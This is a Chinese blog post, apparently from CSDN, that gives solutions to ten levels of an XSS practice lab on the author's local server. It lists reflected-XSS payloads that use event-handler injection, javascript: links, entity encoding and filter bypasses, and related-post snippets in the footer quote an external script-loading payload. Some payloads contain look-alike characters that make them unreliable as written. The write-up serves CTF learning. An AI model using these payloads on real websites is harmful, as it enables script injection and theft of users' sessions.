xss题解

最新推荐文章于 2023-08-10 22:40:24 发布
最新推荐文章于 2023-08-10 22:40:24 发布
阅读量351 收藏
点赞数
分类专栏: CTF 文章标签: xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/S123KO/article/details/100048791
版权

依然是自己地服务器http://127.0.0.1/xss

答案:

1.result: payload框加上 <script>alert(1)</script>

2.result: payload框加上 ?keyword=%09+"+onclick%3Dalert(1)>+需要点击一下输入框。<br>

?keyword=%09+" οnmοuseοver="alert(/s/)"+>+

3.result: 输入框输入 ' ' οnmοuseοver=alert(1)//

(onclick点击 onmouseover 滑过)onerror如果有图片出一个弹窗

几种方式:

不逃逸input的payload   " οnmοuseοver="alert(/s/)  鼠标滑过 " οnmοuseοver="alert(/s/)

                                      "οnclick="alert(/xss/)             鼠标点击

逃逸input的payload:"><img src ! οnerrοr= "alert(/xss/)  如果图片指向非空则执行弹窗操作

"><a href="javascript:alert(/s/)">xss</a>   构建超链接引发弹窗

第一题

<script>alert(1)</script>

第二题

?keyword=%09+"onclick%3D+alert(1)>+需要点击一下输入框。<br>

"><script>alert(1);</script>(形成闭合就行)

第三题

' οnclick=alert(1)//

第四题

" οnclick=alert(1)//

第五题

"><a href="javascript:alert(1)">xss</a>

第六题

" " οnfοcus=alert(1) autofocus=" "

第七题

1" oonnclick=alert(1)//

第八题

首先尝试了javascript:alert(1)

用实体编码

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;(十进制)

第九题

javascr%09ipt:alert(1)//http://

javascrip&#x74;:alert(1)//http://

第十题

<input name="keyword" value="test&t_sort="type="text" onclick = "alert(1)" type="hidden">

   <input name="t_history" value="'.'"type="hidden">

   <input name="t_sort" value=""type="text"οnclick="alert(1)"type=hidden>

 

 

 

 

 

 

睦雨承风
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WEB进阶 XSS题目(1-6)
qq_41819426的博客
03-28 1006
第一关 (无过滤绕过) 第一关中,我们看到一个正常页面,通过对URL的解读我们可以发现我们传递的值为username 我们直接使用script标签尝试。 http://5166c8e9-70dc-4685-9af5-66d6dc3c5fef.node4.buuoj.cn:81/level1?username=<script>alert(1)</script> 很简单的就注入成功了。 第二关(符号过滤) 第二关传递值并没有变化,我们继续尝试使用第一关的语句,发现压根就没有回显。 .
XSS Challenges 题解__进行中
流云阁
04-26 752
地址:http://xss-quiz.int21h.jp/stage 1:input: &lt;script&gt;alert(document.domain)&lt;/script&gt;stage 2:hint: close the current tag and add SCRIPT tag...------&gt; value="" 里面闭合input:   "&gt;&lt;script...
XSS学习 xss-Lab题解
qq_61768489的博客
02-12 2365
level 1 没有任何防护,直接url传xss name=<script>alert(1)</script> level2 有个input标签,尝试用"> 闭合标签 (在网页源代码中,我们输入的数据,是在表单中的value属性内,所以需要先闭合input标签,然后在注入代码,闭合标签) "><script>alert(1)</script> level 3 测试发现尖括号被转换字...
先知XSS挑战赛题解 - Exploiting the "unexploitable"
dengzhasong7076的博客
08-24 845
膜M师傅!!! 挑战说明地址:https://xianzhi.aliyun.com/forum/read/1990.html Writeup已投稿到先知:https://mp.weixin.qq.com/s/d_UCJusUdWCRTo3Vutsk_A 源码下载: http://t.cn/RNG8tZA 0. 说明 玩了挺久的一个挑战,整个过程中被虐到变形,感谢M师傅的小课堂,学习到很多...
XSS基础题
剁椒咸鱼
10-08 264
XSS基础用法: (脚本关14: 当 这道题,先看下面有guest的文本框,当点击提交查询时会更新下面框的内容 所以可以从下面的文本框下手攻击。先查看这个文本框源代码 看到时在input的value中,于是闭合input,输入 alert'onmouseover=alert(HackingLab)>,再看下源码: 成功闭合!鼠标移到input框时,alert HackingLab. ...
西普WEB大部分题解
12-09
总的来说,"西普WEB大部分题解"是一个非常宝贵的资源,它涵盖了Web安全的多个层面,包括但不限于SQL注入、XSS跨站脚本、CSRF跨站请求伪造、文件包含漏洞、命令注入等常见Web漏洞。通过深入学习和实践这些题解,不仅...
题解.rar
10-20
很抱歉,但根据您提供的信息,“题解.rar”这个压缩包文件没有具体的描述或标签来指示它包含的具体IT知识点。通常,"题解"这个词可能指的是编程竞赛或面试问题的解答集,但没有更多信息,我无法提供详细的IT知识。...
网络程序设计——ASP第三版题解
07-04
8. **安全性**:包括防止SQL注入、XSS攻击等网络安全问题的策略和最佳实践。 9. **Web服务和XML**:可能涉及到如何使用ASP创建和消费Web服务,以及XML数据的解析和操作。 通过这本题解,读者可以系统地复习和深化...
CTF-Mobile-Tutorial:我写的一些Mobile CTF题解
03-28
Java代码可能存在的漏洞包括但不限于SQL注入、XSS跨站脚本、权限滥用、未加密敏感数据等。理解Java语言的特性以及如何避免这些常见漏洞至关重要。 三、Android逆向工程 逆向工程是分析移动应用安全的重要手段。通过...
ASP近百问题解
03-16
8. **安全性**:学习ASP的安全实践,包括防止SQL注入、XSS攻击、会话劫持等,确保网站的安全运行。 9. **部署与配置**:了解IIS(Internet Information Services)服务器的配置,以及如何部署和管理ASP应用程序。 ...
test.ctf8(XSS挑战之旅)解题记录
Dexret的博客
12-03 3045
xss平台网址:test.ctf8.com 过关条件:只有能够跳出完成得不错得提示框,即为过关 level1 第一关没啥好说得,入门题 payload <script>alert('abc')</script> level2 该题通过查看网页源码可以看出,该题将我们输入得内容插入到value标签中 那么我们可以通过在输入得内容前加入">去闭合value标签成功弹窗 payload "><script>alert(1)&lt..
关于xss的攻防题
qq_53051166的博客
05-12 438
## ctfhub的xss反射型漏洞 大家好,今天我来说一说ctfhub的xss反射型漏洞。 首先,什么是xssxss是指恶意攻击者往Web页面里插入恶意的Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的的跨站脚本攻击。 而反射型具有非持久化性,需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面。 下面说一下题。 环境:ctfhub的xss反射型 考点:js(javascript),...
xss类型题目总结及例题分析
limenzzz的博客
04-23 4182
一、XSS原理 跨站脚本攻击(XSS),是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常用户访问该页面时,则可导致嵌入的恶意脚本代码的执行,从而达到恶意攻击用户的目的。 HTML是一种超文本标记语言,通过将一些字符特殊地对待来区别文本和标记,例如,小于符号(<)被看作是HTML标签的开始,之间的字符是页面的标题等等。当动态页面中插入的内容含有这些特殊字符(如<)时,用户浏览器会将其误认为是插入了HTML标签,当这些HTML标签引入了一段Ja
记录自己做XSS题目(一)
qq_43776408的博客
07-28 569
网站是https://xss-quiz.int21h.jp 第一题: 答案:"</b><script>alert(document.domain);</script> 第二题: 答案:"><script>alert(document.domain);</script>
ctfhub-技能树-xss题集全部习题详解-最新
最新发布
weixin_73562787的博客
08-10 3317
结合</textarea>'"><script src=http://xsscom.com//He7bc3></script>构成上面源码部分闭合符合条件,可以删掉</textarea>'">不影响。分析一下,代码意思是 从当前页面的URL中获取查询字符串(URL的get参数),如果参数名为"jumpto",则将页面重定向到参数值所指定的URL。然后再复制url,把它复制到第二个框框发送,在我们的xss平台的项目中就会显示刚刚的数据包的信息,在cookie中发现了flag。
常见xss绕过——xss-lab练习(二)
qq_45653588的博客
07-11 316
0X00 level 6 第六关通过几次试探,发现on、src、href几个关键词都被过滤了,但是这次没有过滤掉大小写,于是我们可以构造大小写混杂的payload即可。"><sCript>alert('1')</sCript> 0X01 level 7 第七关输入"><sCript>alert('1')</sCript>,发现大小写过滤了,然后script关键字被除去了,于是我们采用多重嵌套来进行绕过。输入"><scscriptrip
XSS-Game Level 2
热门推荐
wangyuxiang946的博客
07-07 1万+
xssgame2,XSS-Game 第二关将结果拼接到value属性中,需要用双引号闭合属性或者标签。
跨站脚本攻击(反射型xss)笔记(一)
weixin_30566063的博客
01-23 152
环境:一个微信端(所以用浏览器演示UI有点变形) 下图是未插任何脚本时的原页面。 按惯例,上一波【"><script>alert(1)</script>】 无弹窗,看下源代码,尖括号被过滤掉一半!? 试了半天,尖括号还是无法绕开。。 payload: 【 ';})</script><script...
xss-labs 1-15
m0_65977612的博客
11-11 589
BUU XSS-Lab 1-15
理解XSS注入:基础与实战
xss注入讲解ppt.pptx” 本文将深入探讨XSS(跨站脚本)注入的基础知识,包括其定义、危害、历史背景以及简单的原理和环境搭建。XSS攻击是Web应用安全领域中最常见的漏洞之一,它允许攻击者在用户浏览器中执行恶意...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值